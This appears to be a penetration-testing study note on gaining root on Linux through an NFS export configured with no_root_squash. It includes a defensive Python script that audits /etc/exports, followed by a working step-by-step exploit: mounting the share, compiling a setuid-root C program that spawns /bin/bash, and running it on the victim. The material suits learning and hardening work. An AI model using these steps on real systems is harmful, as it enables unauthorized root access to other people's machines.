NFS Root Squashing

no_root_squash

Background Knowledge: no_root_squash

Q: What is NFS?

A: Network File System (NFS) is a UDP-based RPC service. It allows remote hosts to mount file systems over a network and interact with them as though they were mounted locally.

Q: What is root squash?

A: Root squash is a special mapping that maps the remote root user (uid 0) to the local "nobody" user (uid 65534), which has minimal privileges.

Q: What is no_root_squash?

A: In the /etc/exports file, if a directory is exported with the no_root_squash option, a remote root user is mapped to the local root user instead of "nobody".

Q: How is this related to privesc?

A: Suppose we are the root user on our attack machine. We can mount the target directory on our attack machine and, because root squashing is turned off, everything we write to it as root is owned by root on the victim machine. The attack plan is:

  1. Mount the target directory locally

  2. Create a privesc exploit as a SUID binary in the mounted directory

  3. Execute this privesc exploit on the victim machine

Because the directory is shared over NFS, the exploit we create locally appears on the victim machine at the same time as a root-owned SUID binary. Executing it on the victim machine then gives us a root shell.

Enumeration

Examine /etc/exports:

cat /etc/exports

Suppose /tmp is exported with the no_root_squash option turned on; the victim machine is then vulnerable to the attack described above.

On our attack machine, we can verify that the remote /tmp directory is mountable:

showmount -e <remote_ip>
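As an added check for the defender side of this enumeration step (this script is not part of the original notes), the following Python parses the exports(5) syntax and flags every client entry exported with no_root_squash, rating writable exports higher. The exports file below is a constructed sample, not taken from any real host.

```python
import re

# Constructed sample of an /etc/exports file (not taken from any real host).
SAMPLE_EXPORTS = """\
# exports file - constructed sample
/srv/share   10.0.0.0/24(rw,sync,root_squash)
/tmp         *(rw,sync,no_subtree_check,no_root_squash)
/home/backup 192.168.1.5(ro,no_root_squash) 192.168.1.6(rw)
/var/www     10.0.0.0/24(rw,all_squash)
"""

# client spec: "host", "host(opt,opt)", "*(opt)" ...
CLIENT_RE = re.compile(r'([^(]*)(?:\(([^)]*)\))?')

def parse_exports(text):
    """Return (path, client, [options]) for every client entry in exports(5) syntax."""
    entries, logical = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()      # strip comments
        if line.endswith("\\"):                   # backslash continues the line
            logical += line[:-1] + " "
            continue
        fields = (logical + line).split()
        logical = ""
        if not fields:
            continue
        path, clients = fields[0], fields[1:] or ["*"]   # no client means everyone
        for spec in clients:
            m = CLIENT_RE.match(spec)
            client = m.group(1) or "*"
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """Flag entries where a remote uid 0 keeps uid 0 on the server."""
    findings = []
    for path, client, opts in parse_exports(text):
        # root_squash is the default; all_squash maps every uid, root included, to anonymous
        if "no_root_squash" not in opts or "all_squash" in opts:
            continue
        reasons = ["remote root is mapped to local root (no_root_squash)"]
        if "rw" in opts:
            reasons.append("export is writable, so root-owned SUID files can be planted")
        if client in ("*", "<world>") or "*" in client:
            reasons.append("export is reachable from any host (wildcard client)")
        findings.append({"path": path, "client": client,
                         "severity": "high" if "rw" in opts else "medium",
                         "reasons": reasons})
    return findings
```

The same `path client(options)` layout is printed by `exportfs -v`, so its output (which shows the effective options, defaults included) can be fed to `audit_exports` as well.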

Exploitation

Create a temporary directory on our attack machine.

mkdir /tmp/1

Mount the target directory.

mount -o rw,vers=2 <remote_ip>:<target_directory> /tmp/1

Prepare the privesc source code x.c.

printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

Compile the source code.

gcc /tmp/1/x.c -o /tmp/1/x

Turn on the SUID bit.

chmod +s /tmp/1/x

Trigger the payload on the victim machine.

/tmp/x
